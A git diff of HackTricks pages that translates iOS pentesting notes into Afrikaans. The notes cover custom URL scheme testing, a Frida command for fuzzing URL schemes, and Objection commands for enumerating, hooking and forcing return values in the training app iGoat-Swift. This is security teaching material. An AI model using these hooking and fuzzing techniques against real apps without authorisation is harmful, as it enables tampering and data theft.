-This is a sumary from the related information from [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/) +Hierdie is 'n opsomming van die verwante inligting vanaf [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/) -## Basic Information +## Basiese Inligting -Custom URL schemes enable apps to communicate using a custom protocol, as detailed in the [Apple Developer Documentation](https://developer.apple.com/library/content/documentation/iPhone/Conceptual/iPhoneOSProgrammingGuide/Inter-AppCommunication/Inter-AppCommunication.html#//apple_ref/doc/uid/TP40007072-CH6-SW1). These schemes must be declared by the app, which then handles incoming URLs following those schemes. It's crucial to **validate all URL parameters** and **discard any malformed URLs** to prevent attacks through this vector. +Aangepaste URL-skemas stel programme in staat om te kommunikeer deur middel van 'n aangepaste protokol, soos beskryf in die [Apple Developer Documentation](https://developer.apple.com/library/content/documentation/iPhone/Conceptual/iPhoneOSProgrammingGuide/Inter-AppCommunication/Inter-AppCommunication.html#//apple_ref/doc/uid/TP40007072-CH6-SW1). Hierdie skemas moet deur die toepassing verklaar word, wat dan inkomende URL's volgens daardie skemas hanteer. Dit is noodsaaklik om **alle URL-parameters te valideer** en **enige verkeerd geformuleerde URL's te verwerp** om aanvalle deur hierdie vektor te voorkom. -An example is given where the URI `myapp://hostname?data=123876123` invokes a specific application action. A noted vulnerability was in the Skype Mobile app, which allowed unpermitted call actions via the `skype://` protocol. The registered schemes can be found in the app's `Info.plist` under `CFBundleURLTypes`. Malicious applications can exploit this by re-registering URIs to intercept sensitive information. +'n Voorbeeld word gegee waar die URI `myapp://hostname?data=123876123` 'n spesifieke toepassingsaksie aanroep. 'n Opmerklike kwesbaarheid was in die Skype Mobile-toep, wat ongemagtigde oproepaksies via die `skype://`-protokol toegelaat het. Die geregistreerde skemas kan gevind word in die toep se `Info.plist` onder `CFBundleURLTypes`. Kwaadwillige toepassings kan hiervan misbruik maak deur URI's te herregistreer om sensitiewe inligting te onderskep. -### Application Query Schemes Registration - -From iOS 9.0, to check if an app is available, `canOpenURL:` requires declaring URL schemes in the `Info.plist` under `LSApplicationQueriesSchemes`. This limits the schemes an app can query to 50, enhancing privacy by preventing app enumeration. +### Registrasie van Toepassingsnavraagskemas +Vanaf iOS 9.0, om te kontroleer of 'n toepassing beskikbaar is, vereis `canOpenURL:` dat URL-skemas verklaar word in die `Info.plist` onder `LSApplicationQueriesSchemes`. Dit beperk die skemas wat 'n toepassing kan ondersoek tot 50, wat privaatheid verbeter deur toepassingsopnoeming te voorkom. ```xml LSApplicationQueriesSchemes - url_scheme1 - url_scheme2 +url_scheme1 +url_scheme2 ``` +### Toetsing van URL-hantering en validering -### Testing URL Handling and Validation - -Developers should inspect specific methods in the source code to understand URL path construction and validation, such as `application:didFinishLaunchingWithOptions:` and `application:openURL:options:`. For instance, Telegram employs various methods for opening URLs: - +Ontwikkelaars moet spesifieke metodes in die bronkode ondersoek om URL-padkonstruksie en validering te verstaan, soos `application:didFinishLaunchingWithOptions:` en `application:openURL:options:`. Byvoorbeeld, Telegram maak gebruik van verskeie metodes om URL's te open: ```swift func application(_ application: UIApplication, open url: URL, sourceApplication: String?) -> Bool { - self.openUrl(url: url) - return true +self.openUrl(url: url) +return true } func application(_ application: UIApplication, open url: URL, sourceApplication: String?, annotation: Any) -> Bool { - self.openUrl(url: url) - return true +self.openUrl(url: url) +return true } func application(_ app: UIApplication, open url: URL, options: [UIApplicationOpenURLOptionsKey : Any] = [:]) -> Bool { - self.openUrl(url: url) - return true +self.openUrl(url: url) +return true } func application(_ application: UIApplication, handleOpen url: URL) -> Bool { - self.openUrl(url: url) - return true +self.openUrl(url: url) +return true } ``` +### Toetsing van URL-aanvragen aan andere apps -### Testing URL Requests to Other Apps +Metodes soos `openURL:options:completionHandler:` is noodsaaklik vir die oopmaak van URL's om met ander apps te kommunikeer. Die identifisering van die gebruik van sulke metodes in die bronkode van die app is sleutel tot die verstaan van eksterne kommunikasie. -Methods like `openURL:options:completionHandler:` are crucial for opening URLs to interact with other apps. Identifying usage of such methods in the app's source code is key for understanding external communications. +### Toetsing vir verouderde metodes -### Testing for Deprecated Methods +Verouderde metodes wat URL-oopmakings hanteer, soos `application:handleOpenURL:` en `openURL:`, moet geïdentifiseer en nagegaan word vir sekuriteitsimplikasies. -Deprecated methods handling URL openings, such as `application:handleOpenURL:` and `openURL:`, should be identified and reviewed for security implications. - -### Fuzzing URL Schemes - -Fuzzing URL schemes can identify memory corruption bugs. Tools like [Frida](https://codeshare.frida.re/@dki/ios-url-scheme-fuzzing/) can automate this process by opening URLs with varying payloads to monitor for crashes, exemplified by the manipulation of URLs in the iGoat-Swift app: +### Fuzzing van URL-skemas +Fuzzing van URL-skemas kan geheueversteuringsfoute identifiseer. Hulpmiddels soos [Frida](https://codeshare.frida.re/@dki/ios-url-scheme-fuzzing/) kan hierdie proses outomatiseer deur URL's met verskillende ladinge oop te maak om te monitor vir ongelukke, soos geïllustreer deur die manipulasie van URL's in die iGoat-Swift-app: ```bash $ frida -U SpringBoard -l ios-url-scheme-fuzzing.js [iPhone::SpringBoard]-> fuzz("iGoat", "iGoat://?contactNumber={0}&message={0}") @@ -81,23 +74,19 @@ Watching for crashes from iGoat... No logs were moved. Opened URL: iGoat://?contactNumber=0&message=0 ``` - - -## References +## Verwysings * [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
- - diff --git a/mobile-pentesting/ios-pentesting/ios-hooking-with-objection.md b/mobile-pentesting/ios-pentesting/ios-hooking-with-objection.md index 9ee65197f..8352e5497 100644 --- a/mobile-pentesting/ios-pentesting/ios-hooking-with-objection.md +++ b/mobile-pentesting/ios-pentesting/ios-hooking-with-objection.md @@ -1,286 +1,279 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-For this section the tool [**Objection**](https://github.com/sensepost/objection) is going to be used.\ -Start by getting an objection's session executing something like: - +Vir hierdie gedeelte gaan die instrument [**Objection**](https://github.com/sensepost/objection) gebruik word.\ +Begin deur 'n Objection-sessie te kry deur iets soos die volgende uit te voer: ```bash objection -d --gadget "iGoat-Swift" explore objection -d --gadget "OWASP.iGoat-Swift" explore ``` +Jy kan ook `frida-ps -Uia` uitvoer om die lopende prosesse van die foon te kontroleer. -You can execute also `frida-ps -Uia` to check the running processes of the phone. +# Basiese Opname van die app -# Basic Enumeration of the app +## Plaaslike App Paaie -## Local App Paths +* `env`: Vind die paaie waar die toepassing binne die toestel gestoor word -* `env`: Find the paths where the application is stored inside the device +```bash +env - ```bash - env +Name Path +----------------- ----------------------------------------------------------------------------------------------- +BundlePath /private/var/containers/Bundle/Application/179A6E8B-E7A8-476E-BBE3-B9300F546068/iGoat-Swift.app +CachesDirectory /var/mobile/Containers/Data/Application/A079DF84-726C-4AEA-A194-805B97B3684A/Library/Caches +DocumentDirectory /var/mobile/Containers/Data/Application/A079DF84-726C-4AEA-A194-805B97B3684A/Documents +LibraryDirectory /var/mobile/Containers/Data/Application/A079DF84-726C-4AEA-A194-805B97B3684A/Library +``` - Name Path - ----------------- ----------------------------------------------------------------------------------------------- - BundlePath /private/var/containers/Bundle/Application/179A6E8B-E7A8-476E-BBE3-B9300F546068/iGoat-Swift.app - CachesDirectory /var/mobile/Containers/Data/Application/A079DF84-726C-4AEA-A194-805B97B3684A/Library/Caches - DocumentDirectory /var/mobile/Containers/Data/Application/A079DF84-726C-4AEA-A194-805B97B3684A/Documents - LibraryDirectory /var/mobile/Containers/Data/Application/A079DF84-726C-4AEA-A194-805B97B3684A/Library - ``` +## Lys Bundels, raamwerke en biblioteke -## List Bundles, frameworks and libraries +* `ios bundles list_bundles`: Lys bundels van die toepassing -* `ios bundles list_bundles`: List bundles of the application +```bash +ios bundles list_bundles +Executable Bundle Version Path +------------ -------------------- --------- ------------------------------------------- +iGoat-Swift OWASP.iGoat-Swift 1.0 ...8-476E-BBE3-B9300F546068/iGoat-Swift.app +AGXMetalA9 com.apple.AGXMetalA9 172.18.4 ...tem/Library/Extensions/AGXMetalA9.bundle +``` +* `ios bundles list_frameworks`: Lys eksterne raamwerke wat deur die toepassing gebruik word - ```bash - ios bundles list_bundles - Executable Bundle Version Path - ------------ -------------------- --------- ------------------------------------------- - iGoat-Swift OWASP.iGoat-Swift 1.0 ...8-476E-BBE3-B9300F546068/iGoat-Swift.app - AGXMetalA9 com.apple.AGXMetalA9 172.18.4 ...tem/Library/Extensions/AGXMetalA9.bundle - ``` -* `ios bundles list_frameworks`: List external frameworks used by the application +```bash +ios bundles list_frameworks +Executable Bundle Version Path +------------------------------ -------------------------------------------- ---------- ------------------------------------------- +ReactCommon org.cocoapods.ReactCommon 0.61.5 ...tle.app/Frameworks/ReactCommon.framework +...vateFrameworks/CoreDuetContext.framework +FBReactNativeSpec org.cocoapods.FBReactNativeSpec 0.61.5 ...p/Frameworks/FBReactNativeSpec.framework +...ystem/Library/Frameworks/IOKit.framework +RCTAnimation org.cocoapods.RCTAnimation 0.61.5 ...le.app/Frameworks/RCTAnimation.framework +jsinspector org.cocoapods.jsinspector 0.61.5 ...tle.app/Frameworks/jsinspector.framework +DoubleConversion org.cocoapods.DoubleConversion 1.1.6 ...pp/Frameworks/DoubleConversion.framework +react_native_config org.cocoapods.react-native-config 0.12.0 ...Frameworks/react_native_config.framework +react_native_netinfo org.cocoapods.react-native-netinfo 4.4.0 ...rameworks/react_native_netinfo.framework +PureLayout org.cocoapods.PureLayout 3.1.5 ...ttle.app/Frameworks/PureLayout.framework +GoogleUtilities org.cocoapods.GoogleUtilities 6.6.0 ...app/Frameworks/GoogleUtilities.framework +RCTNetwork org.cocoapods.RCTNetwork 0.61.5 ...ttle.app/Frameworks/RCTNetwork.framework +RCTActionSheet org.cocoapods.RCTActionSheet 0.61.5 ....app/Frameworks/RCTActionSheet.framework +react_native_image_editor org.cocoapods.react-native-image-editor 2.1.0 ...orks/react_native_image_editor.framework +CoreModules org.cocoapods.CoreModules 0.61.5 ...tle.app/Frameworks/CoreModules.framework +RCTVibration org.cocoapods.RCTVibration 0.61.5 ...le.app/Frameworks/RCTVibration.framework +RNGestureHandler org.cocoapods.RNGestureHandler 1.6.1 ...pp/Frameworks/RNGestureHandler.framework +RNCClipboard org.cocoapods.RNCClipboard 1.5.1 ...le.app/Frameworks/RNCClipboard.framework +react_native_image_picker org.cocoapods.react-native-image-picker 2.3.4 ...orks/react_native_image_picker.framework +[..] +``` +* `memory list modules`: Lys gelaai modules in die geheue - ```bash - ios bundles list_frameworks - Executable Bundle Version Path - ------------------------------ -------------------------------------------- ---------- ------------------------------------------- - ReactCommon org.cocoapods.ReactCommon 0.61.5 ...tle.app/Frameworks/ReactCommon.framework - ...vateFrameworks/CoreDuetContext.framework - FBReactNativeSpec org.cocoapods.FBReactNativeSpec 0.61.5 ...p/Frameworks/FBReactNativeSpec.framework - ...ystem/Library/Frameworks/IOKit.framework - RCTAnimation org.cocoapods.RCTAnimation 0.61.5 ...le.app/Frameworks/RCTAnimation.framework - jsinspector org.cocoapods.jsinspector 0.61.5 ...tle.app/Frameworks/jsinspector.framework - DoubleConversion org.cocoapods.DoubleConversion 1.1.6 ...pp/Frameworks/DoubleConversion.framework - react_native_config org.cocoapods.react-native-config 0.12.0 ...Frameworks/react_native_config.framework - react_native_netinfo org.cocoapods.react-native-netinfo 4.4.0 ...rameworks/react_native_netinfo.framework - PureLayout org.cocoapods.PureLayout 3.1.5 ...ttle.app/Frameworks/PureLayout.framework - GoogleUtilities org.cocoapods.GoogleUtilities 6.6.0 ...app/Frameworks/GoogleUtilities.framework - RCTNetwork org.cocoapods.RCTNetwork 0.61.5 ...ttle.app/Frameworks/RCTNetwork.framework - RCTActionSheet org.cocoapods.RCTActionSheet 0.61.5 ....app/Frameworks/RCTActionSheet.framework - react_native_image_editor org.cocoapods.react-native-image-editor 2.1.0 ...orks/react_native_image_editor.framework - CoreModules org.cocoapods.CoreModules 0.61.5 ...tle.app/Frameworks/CoreModules.framework - RCTVibration org.cocoapods.RCTVibration 0.61.5 ...le.app/Frameworks/RCTVibration.framework - RNGestureHandler org.cocoapods.RNGestureHandler 1.6.1 ...pp/Frameworks/RNGestureHandler.framework - RNCClipboard org.cocoapods.RNCClipboard 1.5.1 ...le.app/Frameworks/RNCClipboard.framework - react_native_image_picker org.cocoapods.react-native-image-picker 2.3.4 ...orks/react_native_image_picker.framework - [..] - ``` -* `memory list modules`: List loaded modules in memory +```bash +memory list modules +Name Base Size Path +----------------------------------- ----------- ------------------- ------------------------------------------------------------------------------ +iGoat-Swift 0x104ffc000 2326528 (2.2 MiB) /private/var/containers/Bundle/Application/179A6E8B-E7A8-476E-BBE3-B9300F54... +SubstrateBootstrap.dylib 0x105354000 16384 (16.0 KiB) /usr/lib/substrate/SubstrateBootstrap.dylib +SystemConfiguration 0x1aa842000 495616 (484.0 KiB) /System/Library/Frameworks/SystemConfiguration.framework/SystemConfiguratio... +libc++.1.dylib 0x1bdcfd000 368640 (360.0 KiB) /usr/lib/libc++.1.dylib +libz.1.dylib 0x1efd3c000 73728 (72.0 KiB) /usr/lib/libz.1.dylib +libsqlite3.dylib 0x1c267f000 1585152 (1.5 MiB) /usr/lib/libsqlite3.dylib +Foundation 0x1ab550000 2732032 (2.6 MiB) /System/Library/Frameworks/Foundation.framework/Foundation +libobjc.A.dylib 0x1bdc64000 233472 (228.0 KiB) /usr/lib/libobjc.A.dylib +[...] +``` +* `memory list exports `: Uitvoere van 'n gelaai module - ```bash - memory list modules - Name Base Size Path - ----------------------------------- ----------- ------------------- ------------------------------------------------------------------------------ - iGoat-Swift 0x104ffc000 2326528 (2.2 MiB) /private/var/containers/Bundle/Application/179A6E8B-E7A8-476E-BBE3-B9300F54... - SubstrateBootstrap.dylib 0x105354000 16384 (16.0 KiB) /usr/lib/substrate/SubstrateBootstrap.dylib - SystemConfiguration 0x1aa842000 495616 (484.0 KiB) /System/Library/Frameworks/SystemConfiguration.framework/SystemConfiguratio... - libc++.1.dylib 0x1bdcfd000 368640 (360.0 KiB) /usr/lib/libc++.1.dylib - libz.1.dylib 0x1efd3c000 73728 (72.0 KiB) /usr/lib/libz.1.dylib - libsqlite3.dylib 0x1c267f000 1585152 (1.5 MiB) /usr/lib/libsqlite3.dylib - Foundation 0x1ab550000 2732032 (2.6 MiB) /System/Library/Frameworks/Foundation.framework/Foundation - libobjc.A.dylib 0x1bdc64000 233472 (228.0 KiB) /usr/lib/libobjc.A.dylib - [...] - ``` -* `memory list exports `: Exports of a loaded module +```bash +memory list exports iGoat-Swift +Type Name Address +-------- -------------------------------------------------------------------------------------------------------------------------------------- ----------- +variable _mh_execute_header 0x104ffc000 +function _mdictof 0x10516cb88 +function _ZN9couchbase6differ10BaseDifferD2Ev 0x10516486c +function _ZN9couchbase6differ10BaseDifferD1Ev 0x1051648f4 +function _ZN9couchbase6differ10BaseDifferD0Ev 0x1051648f8 +function _ZN9couchbase6differ10BaseDiffer5setupEmm 0x10516490c +function _ZN9couchbase6differ10BaseDiffer11allocStripeEmm 0x105164a20 +function _ZN9couchbase6differ10BaseDiffer7computeEmmj 0x105164ad8 +function _ZN9couchbase6differ10BaseDiffer7changesEv 0x105164de4 +function _ZN9couchbase6differ10BaseDiffer9addChangeENS0_6ChangeE 0x105164fa8 +function _ZN9couchbase6differlsERNSt3__113basic_ostreamIcNS1_11char_traitsIcEEEERKNS0_6ChangeE 0x1051651d8 +function _ZN9couchbase6differlsERNSt3__113basic_ostreamIcNS1_11char_traitsIcEEEERKNS1_6vectorINS0_6ChangeENS1_9allocatorIS8_EEEE 0x105165280 +variable _ZTSN9couchbase6differ10BaseDifferE 0x1051d94f0 +variable _ZTVN9couchbase6differ10BaseDifferE 0x10523c0a0 +variable _ZTIN9couchbase6differ10BaseDifferE 0x10523c0f8 +[..] +``` +## Lys klasse van 'n APP - ```bash - memory list exports iGoat-Swift - Type Name Address - -------- -------------------------------------------------------------------------------------------------------------------------------------- ----------- - variable _mh_execute_header 0x104ffc000 - function _mdictof 0x10516cb88 - function _ZN9couchbase6differ10BaseDifferD2Ev 0x10516486c - function _ZN9couchbase6differ10BaseDifferD1Ev 0x1051648f4 - function _ZN9couchbase6differ10BaseDifferD0Ev 0x1051648f8 - function _ZN9couchbase6differ10BaseDiffer5setupEmm 0x10516490c - function _ZN9couchbase6differ10BaseDiffer11allocStripeEmm 0x105164a20 - function _ZN9couchbase6differ10BaseDiffer7computeEmmj 0x105164ad8 - function _ZN9couchbase6differ10BaseDiffer7changesEv 0x105164de4 - function _ZN9couchbase6differ10BaseDiffer9addChangeENS0_6ChangeE 0x105164fa8 - function _ZN9couchbase6differlsERNSt3__113basic_ostreamIcNS1_11char_traitsIcEEEERKNS0_6ChangeE 0x1051651d8 - function _ZN9couchbase6differlsERNSt3__113basic_ostreamIcNS1_11char_traitsIcEEEERKNS1_6vectorINS0_6ChangeENS1_9allocatorIS8_EEEE 0x105165280 - variable _ZTSN9couchbase6differ10BaseDifferE 0x1051d94f0 - variable _ZTVN9couchbase6differ10BaseDifferE 0x10523c0a0 - variable _ZTIN9couchbase6differ10BaseDifferE 0x10523c0f8 - [..] - ``` +* `ios hooking list classes`: Lys klasse van die app -## List classes of an APP +```bash +ios hooking list classes -* `ios hooking list classes`: List classes of the app +AAAbsintheContext +AAAbsintheSigner +AAAbsintheSignerContextCache +AAAcceptedTermsController +AAAccount +AAAccountManagementUIResponse +AAAccountManager +AAAddEmailUIRequest +AAAppleIDSettingsRequest +AAAppleTVRequest +AAAttestationSigner +[...] +``` +* `ios hooking search classes `: Soek 'n klas wat 'n string bevat. Jy kan **soek na 'n unieke term wat verband hou met die hoof app-pakket** naam om die hoofklasse van die app te vind, soos in die voorbeeld: - ```bash - ios hooking list classes +```bash +ios hooking search classes iGoat +iGoat_Swift.CoreDataHelper +iGoat_Swift.RCreditInfo +iGoat_Swift.SideContainmentSegue +iGoat_Swift.CenterContainmentSegue +iGoat_Swift.KeyStorageServerSideVC +iGoat_Swift.HintVC +iGoat_Swift.BinaryCookiesExerciseVC +iGoat_Swift.ExerciseDemoVC +iGoat_Swift.PlistStorageExerciseViewController +iGoat_Swift.CouchBaseExerciseVC +iGoat_Swift.MemoryManagementVC +[...] +``` - AAAbsintheContext - AAAbsintheSigner - AAAbsintheSignerContextCache - AAAcceptedTermsController - AAAccount - AAAccountManagementUIResponse - AAAccountManager - AAAddEmailUIRequest - AAAppleIDSettingsRequest - AAAppleTVRequest - AAAttestationSigner - [...] - ``` -* `ios hooking search classes `: Search a class that contains a string. You can **search some uniq term that is related to the main app package** name to find the main classes of the app like in the example: +## Lys klasmetodes - ```bash - ios hooking search classes iGoat - iGoat_Swift.CoreDataHelper - iGoat_Swift.RCreditInfo - iGoat_Swift.SideContainmentSegue - iGoat_Swift.CenterContainmentSegue - iGoat_Swift.KeyStorageServerSideVC - iGoat_Swift.HintVC - iGoat_Swift.BinaryCookiesExerciseVC - iGoat_Swift.ExerciseDemoVC - iGoat_Swift.PlistStorageExerciseViewController - iGoat_Swift.CouchBaseExerciseVC - iGoat_Swift.MemoryManagementVC - [...] - ``` +* `ios hooking list class_methods`: Lys metodes van 'n spesifieke klas -## List class methods +```bash +ios hooking list class_methods iGoat_Swift.RCreditInfo +- cvv +- setCvv: +- setName: +- .cxx_destruct +- name +- cardNumber +- init +- initWithValue: +- setCardNumber: +``` +* `ios hooking search methods `: Soek 'n metode wat 'n string bevat -* `ios hooking list class_methods`: List methods of a specific class +```bash +ios hooking search methods cvv +[AMSFinanceVerifyPurchaseResponse + _dialogRequestForCVVFromPayload:verifyType:] +[AMSFinanceVerifyPurchaseResponse - _handleCVVDialogResult:shouldReattempt:] +[AMSFinanceVerifyPurchaseResponse - _runCVVRequestForCode:error:] +[iGoat_Swift.RCreditInfo - cvv] +[iGoat_Swift.RCreditInfo - setCvv:] +[iGoat_Swift.RealmExerciseVC - creditCVVTextField] +[iGoat_Swift.RealmExerciseVC - setCreditCVVTextField:] +[iGoat_Swift.DeviceLogsExerciseVC - cvvTextField] +[iGoat_Swift.DeviceLogsExerciseVC - setCvvTextField:] +[iGoat_Swift.CloudMisconfigurationExerciseVC - cvvTxtField] +[iGoat_Swift.CloudMisconfigurationExerciseVC - setCvvTxtField:] +``` - ```bash - ios hooking list class_methods iGoat_Swift.RCreditInfo - - cvv - - setCvv: - - setName: - - .cxx_destruct - - name - - cardNumber - - init - - initWithValue: - - setCardNumber: - ``` -* `ios hooking search methods `: Search a method that contains a string +# Basiese Hooking - ```bash - ios hooking search methods cvv - [AMSFinanceVerifyPurchaseResponse + _dialogRequestForCVVFromPayload:verifyType:] - [AMSFinanceVerifyPurchaseResponse - _handleCVVDialogResult:shouldReattempt:] - [AMSFinanceVerifyPurchaseResponse - _runCVVRequestForCode:error:] - [iGoat_Swift.RCreditInfo - cvv] - [iGoat_Swift.RCreditInfo - setCvv:] - [iGoat_Swift.RealmExerciseVC - creditCVVTextField] - [iGoat_Swift.RealmExerciseVC - setCreditCVVTextField:] - [iGoat_Swift.DeviceLogsExerciseVC - cvvTextField] - [iGoat_Swift.DeviceLogsExerciseVC - setCvvTextField:] - [iGoat_Swift.CloudMisconfigurationExerciseVC - cvvTxtField] - [iGoat_Swift.CloudMisconfigurationExerciseVC - setCvvTxtField:] - ``` +Nou dat jy die klasse en modules wat deur die toepassing gebruik word, **opgesom** het, het jy dalk 'n paar **interessante klas- en metodenamen** gevind. -# Basic Hooking +## Haak alle metodes van 'n klas -Now that you have **enumerated the classes and modules** used by the application you may have found some **interesting class and method names**. +* `ios hooking watch class `: Haak al die metodes van 'n klas, dump al die aanvanklike parameters en terugvoer -## Hook all methods of a class +```bash +ios hooking watch class iGoat_Swift.PlistStorageExerciseViewController +``` -* `ios hooking watch class `: Hook all the methods of a class, dump all the initial parameters and returns +## Haak 'n enkele metode - ```bash - ios hooking watch class iGoat_Swift.PlistStorageExerciseViewController - ``` +* `ios hooking watch method "-[ ]" --dump-args --dump-return --dump-backtrace`: Haak 'n spesifieke metode van 'n klas deur die parameters, terugvoer en terugvoer van die metode elke keer wat dit geroep word, te dump -## Hook a single method +```bash +ios hooking watch method "-[iGoat_Swift.BinaryCookiesExerciseVC verifyItemPressed]" --dump-args --dump-backtrace --dump-return +``` -* `ios hooking watch method "-[ ]" --dump-args --dump-return --dump-backtrace`: Hook an specific method of a class dumping the parameters, backtraces and returns of the method each time it's called +## Verander Booleaanse Terugvoer - ```bash - ios hooking watch method "-[iGoat_Swift.BinaryCookiesExerciseVC verifyItemPressed]" --dump-args --dump-backtrace --dump-return - ``` +* `ios hooking set return_value "-[ ]" false`: Dit sal die geselekteerde metode laat terugkeer na die aangeduide booleaanse waarde -## Change Boolean Return +```bash +ios hooking set return_value "-[iGoat_Swift.BinaryCookiesExerciseVC verifyItemPressed]" false +``` -* `ios hooking set return_value "-[ ]" false`: This will make the selected method return the indicated boolean - - ```bash - ios hooking set return_value "-[iGoat_Swift.BinaryCookiesExerciseVC verifyItemPressed]" false - ``` - -## Generate hooking template +## Genereer haak sjabloon * `ios hooking generate simple `: - ```bash - ios hooking generate simple iGoat_Swift.RCreditInfo +```bash +ios hooking generate simple iGoat_Swift.RCreditInfo - var target = ObjC.classes.iGoat_Swift.RCreditInfo; +var target = ObjC.classes.iGoat_Swift.RCreditInfo; - Interceptor.attach(target['+ sharedSchema'].implementation, { - onEnter: function (args) { - console.log('Entering + sharedSchema!'); - }, - onLeave: function (retval) { - console.log('Leaving + sharedSchema'); - }, - }); +Interceptor.attach(target['+ sharedSchema'].implementation, { +onEnter: function (args) { +console.log('Entering + sharedSchema!'); +}, +onLeave: function (retval) { +console.log('Leaving + sharedSchema'); +}, +}); - Interceptor.attach(target['+ className'].implementation, { - onEnter: function (args) { - console.log('Entering + className!'); - }, - onLeave: function (retval) { - console.log('Leaving + className'); - }, - }); +Interceptor.attach(target['+ className'].implementation, { +onEnter: function (args) { +console.log('Entering + className!'); +}, +onLeave: function (retval) { +console.log('Leaving + className'); +}, +}); - Interceptor.attach(target['- cvv'].implementation, { - onEnter: function (args) { - console.log('Entering - cvv!'); - }, - onLeave: function (retval) { - console.log('Leaving - cvv'); - }, - }); +Interceptor.attach(target['- cvv'].implementation, { +onEnter: function (args) { +console.log('Entering - cvv!'); +}, +onLeave: function (retval) { +console.log('Leaving - cvv'); +}, +}); - Interceptor.attach(target['- setCvv:'].implementation, { - onEnter: function (args) { - console.log('Entering - setCvv:!'); - }, - onLeave: function (retval) { - console.log('Leaving - setCvv:'); - }, - }); - ``` +Interceptor.attach(target['- setCvv:'].implementation, { +onEnter: function (args) { +console.log('Entering - setCvv:!'); +}, +onLeave: function (retval) { +console.log('Leaving - setCvv:'); +}, +}); +```
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS 